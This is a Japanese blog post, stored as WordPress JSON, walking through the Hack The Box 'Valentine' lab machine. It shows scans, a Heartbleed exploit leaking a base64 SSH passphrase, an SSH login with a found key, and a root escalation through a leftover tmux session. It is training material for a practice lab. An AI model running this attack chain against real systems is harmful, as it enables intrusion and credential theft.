{"id":3748,"date":"2020-08-18T00:48:07","date_gmt":"2020-08-17T15:48:07","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3748"},"modified":"2020-08-30T23:32:44","modified_gmt":"2020-08-30T14:32:44","slug":"hack-the-box-valentine-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3748","title":{"rendered":"Hack The Box – Valentine – Walkthrough"},"content":{"rendered":"

80,443\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b<\/h3>\n
\r\n# nmap -A -n -F -T5 valentine.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-17 11:15 UTC\r\nNmap scan report for valentine.htb (10.10.10.79)\r\nHost is up (0.048s latency).\r\nNot shown: 57 filtered ports, 40 closed ports\r\nPORT    STATE SERVICE VERSION\r\n22\/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)\r\n|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)\r\n|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)\r\n80\/tcp  open  http    Apache httpd 2.2.22 ((Ubuntu))\r\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\r\n|_http-title: Site doesn't have a title (text\/html).\r\n443\/tcp open  ssl\/ssl Apache httpd (SSL-only mode)\r\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\r\n|_http-title: Site doesn't have a title (text\/html).\r\n| ssl-cert: Subject: commonName=valentine.htb\/organizationName=valentine.htb\/stateOrProvinceName=FL\/countryName=US\r\n| Not valid before: 2018-02-06T00:45:25\r\n|_Not valid after:  2019-02-06T00:45:25\r\n|_ssl-date: 2020-08-17T11:21:44+00:00; +5m34s from scanner time.\r\nDevice type: print server|printer\r\nRunning (JUST GUESSING): HP embedded (97%)\r\nOS CPE: cpe:\/h:hp:jetdirect_170x cpe:\/h:hp:inkjet_3000\r\nAggressive OS guesses: HP 170X print server or Inkjet 3000 printer (97%), HP LaserJet 4250 printer (94%)\r\nNo exact OS matches for host (test conditions non-ideal).\r\nNetwork Distance: 2 hops\r\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\r\n<\/pre>\n
heartbleed\u306e\u8106\u5f31\u6027\u304c\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b<\/h3>\n
\"\"<\/a><\/p>\n
\r\n# nmap -T4 --script vuln 10.10.10.79\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-17 15:23 UTC\r\nWarning: 10.10.10.79 giving up on port because retransmission cap hit (6).\r\nNmap scan report for 10.10.10.79\r\nHost is up (0.16s latency).\r\nNot shown: 997 closed ports\r\nPORT    STATE SERVICE\r\n22\/tcp  open  ssh\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n80\/tcp  open  http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/dev\/: Potentially interesting directory w\/ listing on 'apache\/2.2.22 (ubuntu)'\r\n|_  \/index\/: Potentially interesting folder\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\r\n443\/tcp open  https\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/dev\/: Potentially interesting directory w\/ listing on 'apache\/2.2.22 (ubuntu)'\r\n|_  \/index\/: Potentially interesting folder\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)\r\n| ssl-ccs-injection:\r\n|   VULNERABLE:\r\n|   SSL\/TLS MITM vulnerability (CCS Injection)\r\n|     State: VULNERABLE\r\n|     Risk factor: High\r\n|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h\r\n|       does not properly restrict processing of ChangeCipherSpec messages,\r\n|       which allows man-in-the-middle attackers to trigger use of a zero\r\n|       length master key in certain OpenSSL-to-OpenSSL communications, and\r\n|       consequently hijack sessions or obtain sensitive information, via\r\n|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.\r\n|\r\n|     References:\r\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-0224\r\n|       http:\/\/www.cvedetails.com\/cve\/2014-0224\r\n|_      http:\/\/www.openssl.org\/news\/secadv_20140605.txt\r\n| ssl-heartbleed:\r\n|   VULNERABLE:\r\n|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL\/TLS encryption.\r\n|     State: VULNERABLE\r\n|     Risk factor: High\r\n|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\r\n|\r\n|     References:\r\n|       http:\/\/cvedetails.com\/cve\/2014-0160\/\r\n|       http:\/\/www.openssl.org\/news\/secadv_20140407.txt\r\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-0160\r\n| ssl-poodle:\r\n|   VULNERABLE:\r\n|   SSL POODLE information leak\r\n|     State: VULNERABLE\r\n|     IDs:  CVE:CVE-2014-3566  BID:70574\r\n|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\r\n|           products, uses nondeterministic CBC padding, which makes it easier\r\n|           for man-in-the-middle attackers to obtain cleartext data via a\r\n|           padding-oracle attack, aka the "POODLE" issue.\r\n|     Disclosure date: 2014-10-14\r\n|     Check results:\r\n|       TLS_RSA_WITH_AES_128_CBC_SHA\r\n|     References:\r\n|       https:\/\/www.securityfocus.com\/bid\/70574\r\n|       https:\/\/www.openssl.org\/~bodo\/ssl-poodle.pdf\r\n|       https:\/\/www.imperialviolet.org\/2014\/10\/14\/poodle.html\r\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2014-3566\r\n|_sslv2-drown:\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 163.52 seconds\r\n<\/pre>\n
\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u30b9\u30ad\u30e3\u30f3\u3067hype.key\u3092\u898b\u3064\u3051\u308b<\/h3>\n
\r\n# dirb http:\/\/valentine.htb\/\r\n\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\n\r\nSTART_TIME: Mon Aug 17 11:20:20 2020\r\nURL_BASE: http:\/\/valentine.htb\/\r\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\r\n\r\n-----------------\r\n\r\nGENERATED WORDS: 4612\r\n\r\n---- Scanning URL: http:\/\/valentine.htb\/ ----\r\n+ http:\/\/valentine.htb\/cgi-bin\/ (CODE:403|SIZE:289)\r\n+ http:\/\/valentine.htb\/decode (CODE:200|SIZE:552)\r\n==> DIRECTORY: http:\/\/valentine.htb\/dev\/\r\n+ http:\/\/valentine.htb\/encode (CODE:200|SIZE:554)\r\n+ http:\/\/valentine.htb\/index (CODE:200|SIZE:38)\r\n+ http:\/\/valentine.htb\/index.php (CODE:200|SIZE:38)\r\n+ http:\/\/valentine.htb\/server-status (CODE:403|SIZE:294)\r\n\r\n---- Entering directory: http:\/\/valentine.htb\/dev\/ ----\r\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\r\n    (Use mode '-w' if you want to scan it anyway)\r\n\r\n-----------------\r\nEND_TIME: Mon Aug 17 11:44:47 2020\r\nDOWNLOADED: 4612 - FOUND: 6\r\n<\/pre>\n
\"\"<\/a>
\n\"\"<\/a>
\nhype.key\u306b\u3064\u3044\u306616\u9032\u6570\u3067\u3042\u308aCyberChef<\/a>\u3092\u5229\u7528\u3059\u308b\u3068\u3001\u6697\u53f7\u5316\u3055\u308c\u305fSSH\u9375\u306b\u5909\u63db\u3067\u304d\u308b\u3002
\n\"\"<\/a><\/p>\n
heartbleed\u3092\u5229\u7528\u3057\u3066\u6697\u53f7\u5316\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u53d6\u5f97\u3059\u308b<\/h3>\n
\r\n# searchsploit heartbleed\r\n-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\n Exploit Title                                                                                                                  |  Path\r\n-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nOpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL\/TLS Versions)                             | multiple\/remote\/32764.py\r\nOpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (1)                                                             | multiple\/remote\/32791.c\r\nOpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)                                              | multiple\/remote\/32998.c\r\nOpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure                                                                | multiple\/remote\/32745.py\r\n-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\r\nShellcodes: No Results\r\n# searchsploit -m multiple\/remote\/32745.py\r\n  Exploit: OpenSSL TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure\r\n      URL: https:\/\/www.exploit-db.com\/exploits\/32745\r\n     Path: \/usr\/share\/exploitdb\/exploits\/multiple\/remote\/32745.py\r\nFile Type: Python script, ASCII text executable, with CRLF line terminators\r\n\r\nCopied to: \/home\/shimizu\/valentine\/32745.py\r\n\r\n# python 32745.py valentine.htb\r\nConnecting...\r\nSending Client Hello...\r\nWaiting for Server Hello...\r\n ... received message: type = 22, ver = 0302, length = 66\r\n ... received message: type = 22, ver = 0302, length = 885\r\n ... received message: type = 22, ver = 0302, length = 331\r\n ... received message: type = 22, ver = 0302, length = 4\r\nSending heartbeat request...\r\n ... received message: type = 24, ver = 0302, length = 16384\r\nReceived heartbeat response:\r\n  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...\r\n  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......\r\n  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".\r\n  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.\r\n  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................\r\n  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.\r\n  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D.....\/...\r\n  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............\r\n  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................\r\n  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.\r\n  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............\r\n  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................\r\n  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................\r\n  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E  ....#.......0.0.\r\n  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1\/decode.php..Co\r\n  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl\r\n  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication\/x-www-fo\r\n  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C\r\n  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4\r\n  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc\r\n  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld\r\n  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D 77  mV0aGVoeXBlCg==w\r\n  0160: 4F 73 0B 2B 20 67 8B E1 B7 81 74 62 F2 DC 91 7A  Os.+ g....tb...z\r\n  0170: 04 CC 8A 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................\r\n...\r\n\r\n# echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d\r\nheartbleedbelievethehype\r\n<\/pre>\n
hype.key\u3092\u5229\u7528\u3057\u3066\u3001SSH\u30ed\u30b0\u30a4\u30f3\u3059\u308b<\/h3>\n
\u203bhype.key\u3092\u5909\u63db\u3057\u3066\u3001\u540c\u540d\u3067\u5229\u7528\u3057\u3066\u3044\u308b\u3002<\/p>\n
\r\n# chmod 600 hype.key\r\n# ssh -i hype.key hype@valentine.htb\r\nload pubkey "hype.key": invalid format\r\nEnter passphrase for key 'hype.key':\r\nWelcome to Ubuntu 12.04 LTS (GNU\/Linux 3.2.0-23-generic x86_64)\r\n\r\n * Documentation:  https:\/\/help.ubuntu.com\/\r\n\r\nNew release '14.04.5 LTS' available.\r\nRun 'do-release-upgrade' to upgrade to it.\r\n\r\nLast login: Fri Feb 16 14:50:29 2018 from 10.10.14.3\r\nhype@Valentine:~$ exit\r\nlogout\r\nConnection to valentine.htb closed.\r\n# ssh -i hype.key hype@valentine.htb\r\nload pubkey "hype.key": invalid format\r\nEnter passphrase for key 'hype.key':\r\nWelcome to Ubuntu 12.04 LTS (GNU\/Linux 3.2.0-23-generic x86_64)\r\n\r\n * Documentation:  https:\/\/help.ubuntu.com\/\r\n\r\nNew release '14.04.5 LTS' available.\r\nRun 'do-release-upgrade' to upgrade to it.\r\n\r\nLast login: Mon Aug 17 07:18:11 2020 from 10.10.14.12\r\nhype@Valentine:~$ pwd\r\n\/home\/hype\r\nhype@Valentine:~$ ls\r\nDesktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos\r\nhype@Valentine:~$ cat Desktop\/user.txt\r\ne6710a5464769fd5fcd216e076961750\r\n\r\nhype@Valentine:~$ history\r\n    1  exit\r\n    2  exot\r\n    3  exit\r\n    4  ls -la\r\n    5  cd \/\r\n    6  ls -la\r\n    7  cd .devs\r\n    8  ls -la\r\n    9  tmux -L dev_sess\r\n   10  tmux a -t dev_sess\r\n   11  tmux --help\r\n   12  tmux -S \/.devs\/dev_sess\r\n\r\nhype@Valentine:~$ !12\r\n\r\nroot@Valentine:\/home\/hype# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@Valentine:\/home\/hype# cat \/root\/root.txt\r\nf1bb6d759df1f272914ebbc9ed7765b2\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
80,443\u30dd\u30fc\u30c8\u304c\u516c\u958b\u3055\u308c\u3066\u3044\u308b # nmap -A -n -F -T5 valentine.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-17 11:1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3748"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3748"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3748\/revisions"}],"predecessor-version":[{"id":3781,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3748\/revisions\/3781"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}